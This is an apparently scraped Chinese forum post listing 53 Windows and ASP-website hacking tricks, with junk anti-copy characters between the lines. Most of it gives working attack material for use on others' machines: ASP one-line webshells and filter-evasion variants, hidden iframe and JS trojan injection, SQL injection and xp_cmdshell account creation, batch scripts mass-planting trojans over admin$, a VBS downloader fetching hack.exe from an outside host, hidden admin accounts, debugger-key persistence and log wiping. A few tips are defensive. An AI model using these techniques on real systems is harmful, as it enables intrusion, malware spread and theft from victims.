Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
2 E3 O6 F9 |4 s8 ], D5 F2 |- i. Tcacls C:\windows\system32 /G hqw20:R
6 m6 ]9 }' k7 h' Q& _- J2 w# Y7 j1 m" b思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入) N2 E; [2 R+ F# h4 O3 B
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F6 T- M& c8 t* R( l
3 d s) |6 b, W& K, u
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
) O& m1 h7 N' d. V4 d( w
7 G% |# s; ?! V, |1 h: M# u3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。% h7 _* d1 V3 M0 o
, W1 l* l/ |% A& H7 x0 K4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号8 v% {3 ]* v" f9 f! r
! h F$ C4 G9 V. J) U( ~5、利用INF文件来修改注册表
' v8 P3 T6 r ]; P; K$ C% J[Version]
' N% d+ d' \3 w% O; x% A) @Signature="$CHICAGO$"* N/ W, t. a: h7 z2 k
[Defaultinstall]7 x$ x4 k. h; E/ q4 n/ O9 |
addREG=Ating* _ j; Z, |3 A
[Ating]
. B+ H4 N g4 q g7 s2 \HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"8 U+ @5 |( ~" ]! A5 R9 a
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
" g$ \# S: w% J U8 t% `" hrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
# U# a3 e: P1 C$ x9 E* H其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
- t3 k7 O! P' m. s9 G$ _3 b* ] EHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
1 X0 w- k% G& DHKEY_CURRENT_CONFIG 简写为 HKCC
- r# c2 e' \ ?" e1 I5 _! j! W0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
) t& Z. ?* [6 M/ Q4 w" V"1"这里代表是写入或删除注册表键值中的具体数据. p5 T# u" `( S) ?
! s# D) M8 |6 y- p
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
/ n8 f$ V. J: g6 l; i9 x, `$ a' A多了一步就是在防火墙里添加个端口,然后导出其键值
, @' a) {8 G m" m1 \6 y4 m[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
i, |9 f" g9 }# n: E& ~/ U9 c, _ u; w" v1 A4 m- r0 Z4 B
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
/ L: r$ c/ k" B0 [: M在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。; n- E' C# P- k5 z+ c9 j" U# v" M6 x
i* z1 E0 k) m: M8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。1 D* h U# i9 A$ \ _
3 v1 Y, ?% |: d
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,/ T }- h' {7 f5 ]& s \. K
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
" ?* L" m- B* q/ A2 D; B2 w) y# p. H8 Y! J; }
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login” ^7 p% K7 O$ p5 E) R! V! s) F3 m7 o
, B! E V) P( e F- d
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,) ~( C. r# X4 i& T6 o7 w9 I7 n! z
用法:xsniff –pass –hide –log pass.txt
- N; c* i+ b: ^
$ Q4 b# ?6 x7 o% p# Y# N12、google搜索的艺术
2 p! E+ _! d2 Y+ Q; R( q搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
! ?7 w5 C8 J( z0 W7 s+ R或“字符串的语法错误”可以找到很多sql注入漏洞。% s1 G" E$ N; r" Z
# D. q5 O. g- C2 g; U
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
y! K/ }0 U- X/ E7 I J \
( F+ s/ e& [' F; V# A' b4 ?- R14、cmd中输入 nc –vv –l –p 1987
( _" ^ S8 j. t2 V4 }做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
# h/ ^" ^3 z: j0 |4 h' S2 s6 z/ T% I+ R( v5 P0 t: z/ N, C2 w
15、制作T++木马,先写个ating.hta文件,内容为
! _" {) u. g# _# T3 g$ M+ J<script language="VBScript">, ?2 J! Z. n ]/ _; k5 f x' n
set wshshell=createobject ("wscript.shell" ) D/ ?2 p! }0 f- u8 d
a=wshshell.run("你马的名称",1), N' _$ o1 _6 n7 Z2 W$ T
window.close0 E2 H9 @0 I$ M+ G* ]* O
</script>! o6 P6 c( `# r" O7 W6 G& x% ~6 f
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。' [7 j, J8 Z+ {7 l' u: H
! X9 Z/ [; W; E6 o {3 ~16、搜索栏里输入+ j$ c8 P+ F3 e" b' m0 }5 s
关键字%'and 1=1 and '%'='
! _6 }" f! M) ?9 e4 |9 M关键字%'and 1=2 and '%'='
, L, A. q: H) b比较不同处 可以作为注入的特征字符
7 j5 ?' p) d4 s) e1 d0 O3 i, }+ i( A; J% m
17、挂马代码<html>9 N; i) o. ~$ [
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
/ W; m; U3 m. v$ v</html>
2 W" _; Y a' v: L2 F5 \1 B
6 r6 z6 n4 J: b6 r5 V18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,' x+ _0 Z3 _' O6 A7 }
net localgroup administrators还是可以看出Guest是管理员来。8 a b, a. d4 j' w6 y. q0 G
8 P& O0 }# `7 |0 Q6 L6 z5 c W19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
5 s" w( Z- q; S* l& Y用法: 安装: instsrv.exe 服务名称 路径
" c* @1 E% P: j3 r" m# W& X卸载: instsrv.exe 服务名称 REMOVE
' H+ E: ]- `9 Y" j5 m6 C
' @, m% Q! |/ Y a; X, N
' \! z' F" b$ g* }1 t. [1 o21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉. F' r% X- o8 N8 s
不能注入时要第一时间想到%5c暴库。
; f, T7 ]1 z) r) |
! O- N4 G/ V7 D0 A22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~4 o6 ^3 Q- i- t8 C* |: i4 I
( m! n: H. v1 l( W/ S& R! D& a
23、缺少xp_cmdshell时
% c7 a: c' u8 D# f: G* g, p/ g- @5 D尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'3 k' ^$ t) M* o' o( z( Y; b
假如恢复不成功,可以尝试直接加用户(针对开3389的)
, M5 e j F- B" U( B* Zdeclare @o int
6 j; h ^# f" Hexec sp_oacreate 'wscript.shell',@o out
. E9 G) m" e$ j# ^exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员$ H) B3 P" e" o% z% Z& `7 e3 C5 A
5 E9 U) q4 v# h/ N/ p* G24.批量种植木马.bat6 e. ]1 B% v2 q5 q1 A
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
' Z: G' |3 V2 I( ?for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间( r$ B# ~/ g) u# p6 L, M: |
扫描地址.txt里每个主机名一行 用\\开头+ A8 D& k2 [+ A1 ]9 Y1 B m" `
. b: W8 x% n/ Q, D$ ~ \25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。0 G4 f: J1 O& @9 N: l- ]$ p) n
) K' L; }$ Q$ I d, e B% d: M& P26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
: I' d+ C9 K9 [+ C将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.. z7 I. [9 {7 b, B1 c1 D0 H$ Y
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
9 c( {7 H. l+ [ W4 j! z% ]$ M% L. B
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
' `0 t3 z# e( S4 n7 }" l然后用#clear logg和#clear line vty *删除日志# T2 g1 Z9 x* o& o: n/ G3 Q
* x4 O( d3 ~' r" I% \
28、电脑坏了省去重新安装系统的方法
) r+ M2 _5 d5 A+ ~8 W; P纯dos下执行,
, ?+ R8 u, l/ fxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config9 }. _6 q2 n& `% b
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config3 ^& m$ V; E! t8 _+ W6 M3 m
% W& |! m& F% D/ _: Q0 j( m9 ~
29、解决TCP/IP筛选 在注册表里有三处,分别是:
- [ [# y- \, u D& vHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
6 r/ o4 a8 \( C4 m& AHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip Z, K( e1 g1 R$ o& F, T4 j# D
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
6 Y0 \! Z5 q! s" C分别用8 G" b; @# z1 \% s
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip: I1 f0 o4 k0 M# \) P/ W
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip' l$ u5 X$ [" j9 M1 I2 w" M w
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
) y: X& I' ~2 t% N ^7 D命令来导出注册表项2 K2 Z2 s2 ]" B, X, ~4 f& H- ?
然后把三个文件里的EnableSecurityFilters"=dword:00000001,% m+ b3 Z+ f9 F
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用. {' b3 S4 K! y) E8 Z! I
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。. f R/ a* T3 E: G1 j4 w* L( h
9 v, e. H' ^0 c8 K30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U) e9 |# I: a6 P0 f1 _
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3; K, E6 x$ R3 }
: M- C" \" { `# ? A' Q31、全手工打造开3389工具. n% |/ K/ t9 x3 x, j( E
打开记事本,编辑内容如下:3 d" f; R4 G2 y! V% }: T; R3 @! F
echo [Components] > c:\sql
, ?- [2 f# j8 ]echo TSEnable = on >> c:\sql
' J) \" @$ p7 O4 s+ [2 P- Msysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
' m5 [, e: @4 \, ~& e- o编辑好后存为BAT文件,上传至肉鸡,执行
, m' k6 R1 f9 e/ g, ^
# U6 ^- f s) V$ g9 `* [32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
. `" E: Q& T& t# D% U+ F# r0 ?5 z, t& T
33、让服务器重启# s, U% [7 c; L* Z
写个bat死循环:
1 L( `0 }1 Q4 {5 m' f3 V@echo off
; Y) y# A5 {( J' A. n9 C: L, I:loop1
X _& m7 T. }, T! s4 gcls; d2 P8 L6 o' w/ J
start cmd.exe( i% V6 F9 [, v6 Z& I" I
goto loop1
' [: `: O: s8 [0 `3 x( f保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启; d4 m3 I, W& U' u d# S" Q
- [! V9 F* S6 L' c9 L/ @
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
: j0 m5 U7 j- }8 I@echo off
& @9 k- o' J/ j) t6 Mdate /t >c:/3389.txt
6 C9 o' @5 X& \" y( P. Ltime /t >>c:/3389.txt% P: A/ I0 c3 D# f
attrib +s +h c:/3389.bat5 t( Q1 R. ?4 Q; z" N5 C* U& d
attrib +s +h c:/3389.txt
# P8 d; C) _. P' p; p0 f! y! gnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt _; V u. y$ Z+ z# t. h
并保存为3389.bat
/ F& X6 ~2 X& P打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号1 I$ _7 v3 N( @6 S. K' E3 A
$ Y' d4 n* Q3 Q# R35、有时候提不了权限的话,试试这个命令,在命令行里输入:$ e# G4 A4 I" ?2 E! |2 R
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)# T! r% S+ e7 p& b+ O" D
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
0 D" | @) K4 I8 T: K' v! @
C. S) r- o6 w6 u7 S36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件$ z# \6 M0 i* _8 F; n
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址: \6 h8 B T5 i$ ?& ^
echo 你的FTP账号 >>c:\1.bat //输入账号" {' i7 b+ w7 G# W
echo 你的FTP密码 >>c:\1.bat //输入密码 o1 z& Q" {- J* R! y
echo bin >>c:\1.bat //登入2 m, G$ x) P. t% T1 u8 T
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
$ R1 x4 ?" ~* ]$ B' T) @echo bye >>c:\1.bat //退出: {* m* O# B4 ^: M
然后执行ftp -s:c:\1.bat即可3 |" x7 Z+ g- s, w
2 {0 k# \; I; ]' R3 i
37、修改注册表开3389两法
) [2 t( Z6 z0 H(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
# \! ?' i" n) S# c* ~/ Gecho Windows Registry Editor Version 5.00 >>3389.reg+ |3 o, x4 S4 J
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
& X- m+ y/ l" S# B4 U" Recho "Enabled"="0" >>3389.reg
$ F7 u( B5 n5 Q- F; }echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows2 k3 X$ C) T4 q: Q6 G7 f
NT\CurrentVersion\Winlogon] >>3389.reg. v9 G3 p v3 L, q9 X0 T- p# S
echo "ShutdownWithoutLogon"="0" >>3389.reg
9 G' |' y8 { m+ wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]- t8 G( d) J: u
>>3389.reg i+ U- L( Q3 g; ]9 ~7 u
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg' k9 a7 c" d+ ]$ s3 j" t$ X8 f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]' N7 J: y+ X# J7 b
>>3389.reg
( l+ Y. [$ b' @/ l3 recho "TSEnabled"=dword:00000001 >>3389.reg0 ?. \3 [7 V' W0 _0 x" {8 i/ m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg' ~* x G: i, B& g6 |
echo "Start"=dword:00000002 >>3389.reg
; J' a* U6 F! jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
% w: E- U) ]9 M: B6 y+ j4 ]6 n) N8 k& u) o>>3389.reg; T7 q( m7 F- Z8 z& ]& e# U* s
echo "Start"=dword:00000002 >>3389.reg- D# E! l1 p Y5 E
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
- }0 O% V6 H; |* Y* o( }. secho "Hotkey"="1" >>3389.reg
- ]' K; r2 A( F& K secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& O) v: g6 o: O) J" G2 V3 c
Server\Wds\rdpwd\Tds\tcp] >>3389.reg4 Z" Q; Y& |: H" V
echo "PortNumber"=dword:00000D3D >>3389.reg
7 \' q$ U+ j5 n# V6 X6 |- |6 Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( n) a7 ^. v) J, k9 `% W5 ], j+ y
Server\WinStations\RDP-Tcp] >>3389.reg
: @8 W4 l5 j- `! b* P5 C) Jecho "PortNumber"=dword:00000D3D >>3389.reg
6 E5 l3 d2 g- w7 e# N1 b- s- Y$ m把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。. r, F3 Y& F) T: j
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
5 V) P; i8 r; @- v X/ k7 Q因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效9 s% {" h- s5 h" z, ]& d4 Z- _" f
(2)winxp和win2003终端开启
+ V, M' X) g2 C5 b! i6 @" Q用以下ECHO代码写一个REG文件:, \1 Q4 }5 m& }; |
echo Windows Registry Editor Version 5.00>>3389.reg
! {2 v+ B/ B1 U0 b' X! t* Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' t( a4 B- D- I0 S4 CServer]>>3389.reg
9 P" V8 r% U2 M7 ~6 hecho "fDenyTSConnections"=dword:00000000>>3389.reg
4 s1 g$ a2 u6 J6 @$ ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 Y U& W; E# |& [/ x/ k g
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
! c2 r* Z4 d# m2 yecho "PortNumber"=dword:00000d3d>>3389.reg
9 \& ]! e5 R1 u% F' N% X0 hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 c, C* g: `- k1 J- w7 _Server\WinStations\RDP-Tcp]>>3389.reg7 V/ z2 ^( S7 e+ B4 t; ]
echo "PortNumber"=dword:00000d3d>>3389.reg# [) U' i# ` N2 I! E/ k3 R
然后regedit /s 3389.reg del 3389.reg& H+ l8 O" W2 C5 P: H
XP下不论开终端还是改终端端口都不需重启" n* t1 K5 ^; P0 |, o7 _
* N* v( j) w; W8 T38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃( M4 l( C8 A8 h
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
, _. H0 X# V4 I" p7 X P- f. I c
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!9 V- [% {6 ?$ _6 A1 x- [
(1)数据库文件名应复杂并要有特殊字符
& j9 \$ ]' P( F* Z% l) k(2)不要把数据库名称写在conn.asp里,要用ODBC数据源# |/ p8 f$ [& x$ s# R
将conn.asp文档中的
( h$ s! O+ A% E6 u* @( J) _* RDBPath = Server.MapPath("数据库.mdb")0 B7 m: f) f' x" F( X
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
5 ]# L3 x x4 y4 D% v
1 l# q5 r% t) P2 d修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置' ~) \( A$ V& e+ A7 A# ]& u
(3)不放在WEB目录里
% y2 r$ K' l& W. J( U2 f$ `; [% g. t* ~% F! W+ k
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉! {4 i+ u& l( K, b9 H! K/ G
可以写两个bat文件7 \' s6 n' Z, w) y3 v( g5 q
@echo off
6 ^% Y) o6 V& L% D8 ?@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe- T1 Y1 b* o& V. g( l
@del c:\winnt\system32\query.exe
1 s8 G& `; U/ U5 E4 \& i B@del %SYSTEMROOT%\system32\dllcache\query.exe# A# r9 y* O* {
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的2 x6 Z& k& @$ t5 c2 H
9 s* N5 o& B8 Y2 v% C- T@echo off3 {/ Q! H i" U
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
# x: U8 x% J$ ]: Y@del c:\winnt\system32\tsadmin.exe
) L- g; h) S7 l/ F@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex0 F- }5 r4 Y9 H
J- U9 t. W" C8 s: M* l: b
41、映射对方盘符- v' ]- I* h! q: g9 \) y
telnet到他的机器上,
/ M2 |# f8 a# x* b1 t: Unet share 查看有没有默认共享 如果没有,那么就接着运行$ X! I: ?& M5 t0 o
net share c$=c:6 K8 e7 L) k9 p0 x
net share现在有c$! ?3 d2 Y% M+ i
在自己的机器上运行 a1 Y6 g( m! O; J* o0 r5 ^
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
* u+ T6 s' T5 W4 i& j
8 C, h4 m9 ?) V; O/ x* i o42、一些很有用的老知识
1 w% V+ N( L2 E5 A4 F1 }/ jtype c:\boot.ini ( 查看系统版本 )
7 L# L6 L) U( X1 |net start (查看已经启动的服务)
5 d% n& e' k1 B( B+ I4 l- ^6 }query user ( 查看当前终端连接 )
1 {; K! R, h- l6 h0 T4 Xnet user ( 查看当前用户 )
" k$ p: A4 u R' ` _ znet user 用户 密码/add ( 建立账号 )
, D6 m; D3 f. ^0 N4 T4 s4 R. vnet localgroup administrators 用户 /add (提升某用户为管理员)
( G. ~7 K. m* H/ ]8 W% Ripconfig -all ( 查看IP什么的 )" v' U1 w( J( x% e" u
netstat -an ( 查看当前网络状态 )
/ o k& ~0 Y7 L- ffindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)0 t6 b7 O: R: S9 C
克隆时Administrator对应1F4- ~: z* O# C1 |) a, P
guest对应1F5
O" F& \- T' V: d4 j- Y) Ztsinternetuser对应3E83 U4 ~. M# I& O1 I. U
- s7 Q$ Q1 p8 }: |9 a2 @
43、如果对方没开3389,但是装了Remote Administrator Service; m \2 l4 X6 l3 W+ c
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接$ X* p% E" G- O
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
7 T3 x! O/ B1 O2 Y$ n! w% V! d: @. h先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
' o" d7 l. c/ y1 j
: J1 }9 _& r$ _1 y9 ]* c" o44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)' o+ Z- g& \% h! f4 l( S% q
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
) c8 C9 v/ ?) o3 P+ J9 }& B; d2 u9 _% G" [
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
# @! f: m \+ ~7 M0 ~1 a, becho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
% I" V/ ]& Q, w) l6 y^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
; n# [0 I" M! f, nCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =9 ~& x) T, _1 q1 a& G" |/ p9 ]/ |
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs: ?' w1 g4 R" E& i5 r
(这是完整的一句话,其中没有换行符) i- q- s4 R# @, q
然后下载:$ a4 w9 h- w7 K0 a6 q
cscript down.vbs http://www.hack520.org/hack.exe hack.exe0 A, H" F9 X4 @+ e
& z& z1 }" C d1 l, F3 \46、一句话木马成功依赖于两个条件:
* Z6 @) [" z& H1 i! `) k1、服务端没有禁止adodb.Stream或FSO组件* y, b( N) \# P# k: ]2 h& F
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。2 H9 m( o, e8 K2 H
& _ y- p: v, f; g' ?6 b# S47、利用DB_OWNER权限进行手工备份一句话木马的代码:
" Z/ X& H: W8 d# }3 k;alter database utsz set RECOVERY FULL--
4 k/ D8 [5 @2 s- Q" o$ n;create table cmd (a image)--
& J" e3 m" R% K; w& S4 C;backup log utsz to disk = 'D:\cmd' with init--( L" |5 w, b4 F4 I
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
0 F: e4 [1 u6 ?- \;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--4 G6 p5 e, g$ k" h# m; e
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
# ?, \" p; t% g% ?' P& P2 c& r' e1 N6 D
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
* T4 ^; r! u+ D2 I
4 I& e F8 h2 _& C( k/ X用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options+ w6 J& _% g! |9 a( o
所有会话用 'all'。
5 m& h5 d7 P9 F-s sessionid 列出会话的信息。
; c0 \8 d9 r( Y; l-k sessionid 终止会话。3 d0 X$ V, \* r$ L
-m sessionid 发送消息到会话。
' G( v$ v6 M. t# `, |9 K
4 {5 S: m7 Y# z; p9 cconfig 配置 telnet 服务器参数。
' Y+ h7 l& w+ F- O0 k6 p I5 Q' o* Z0 l: e
common_options 为:
9 `9 f) G4 n! X' ~+ \% O-u user 指定要使用其凭据的用户
! q6 ~3 S/ ?& `4 d- ]8 c-p password 用户密码
4 S- W* \- ]! o3 i T4 U3 I. u) D# C7 J/ a
config_options 为:2 |% s0 z4 G( v
dom = domain 设定用户的默认域, P. x: u: J1 r, _( ^; \: q' }8 y
ctrlakeymap = yes|no 设定 ALT 键的映射
# I0 D, h0 x; Y; S7 ]timeout = hh:mm:ss 设定空闲会话超时值( R+ L! e' B8 k0 U: y7 C
timeoutactive = yes|no 启用空闲会话。
; @% Y, b$ m. r% bmaxfail = attempts 设定断开前失败的登录企图数。8 W$ V: l% s" D, } k
maxconn = connections 设定最大连接数。
% e9 q5 q( [% z" rport = number 设定 telnet 端口。
! x1 C% x. G9 e+ u: e2 g% T1 fsec = [+/-]NTLM [+/-]passwd
6 o- D$ p& o2 [# w3 L |设定身份验证机构/ u9 U1 Z, v5 Z( P
fname = file 指定审计文件名。
" ?3 O, O: J, V% Hfsize = size 指定审计文件的最大尺寸(MB)。
+ }6 t5 {2 K1 p4 e8 }+ i Emode = console|stream 指定操作模式。6 v* t2 Q4 B/ Q: Y& C" R$ N
auditlocation = eventlog|file|both5 V( g0 b/ A. ^5 @1 \2 m$ S5 }
指定记录地点
- R. @; B/ \' M- r! haudit = [+/-]user [+/-]fail [+/-]admin2 j; P, i1 U" R
# c- U3 u4 s3 R, N8 j49、例如:在IE上访问:+ ]9 v, I8 T4 o' \0 D
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/. N K* h7 D% ?; j! {$ f
hack.txt里面的代码是:
. F. \6 z5 I; h" g<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">; |1 Y0 n6 C' o+ \* _
把这个hack.txt发到你空间就可以了! D( M( x5 K5 a, d& t
这个可以利用来做网马哦!
4 K! @3 F$ `8 I, ?) a6 h/ z: C3 q! R/ m
50、autorun的病毒可以通过手动限制!$ Q" V( c& Q0 x
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
# y( j& e( A6 ] t D6 f8 E2,打开盘符用右键打开!切忌双击盘符~
& y( M) Z+ E# u+ o; f. z3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!$ ?$ r2 i' X; B
4 _4 S7 }, R- l' A, } ^9 g51、log备份时的一句话木马:
H& M- C" @$ O# k* h" N# V0 \6 xa).<%%25Execute(request("go"))%%25>
* m: z( z/ b F& h7 F8 X$ W* Z. Kb).<%Execute(request("go"))%>
2 ^. [9 v0 r* S0 {! y5 Rc).%><%execute request("go")%><%. t3 ^! k5 _% r1 k0 Z, G
d).<script language=VBScript runat=server>execute request("sb")</Script>
4 T+ d5 x! }0 `+ M+ w% Le).<%25Execute(request("l"))%25>7 W# v9 p' T9 y {
f).<%if request("cmd")<>"" then execute request("pass")%>9 m. V+ q0 f1 n9 Q D
1 w- b0 V3 L2 i9 z/ R52、at "12:17" /interactive cmd
' n& E0 g- a. J. k p5 v执行后可以用AT命令查看新加的任务
e1 B% R: ~8 V) `# Q. A3 i用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
, C7 c3 ~- H/ L6 n) I- ~/ h! J6 [$ X8 P+ r
53、隐藏ASP后门的两种方法
' [% V6 c4 \# P4 k7 f: r' Q; d1、建立非标准目录:mkdir images..\, _9 R& E4 i8 `9 R+ h' Y0 p/ o
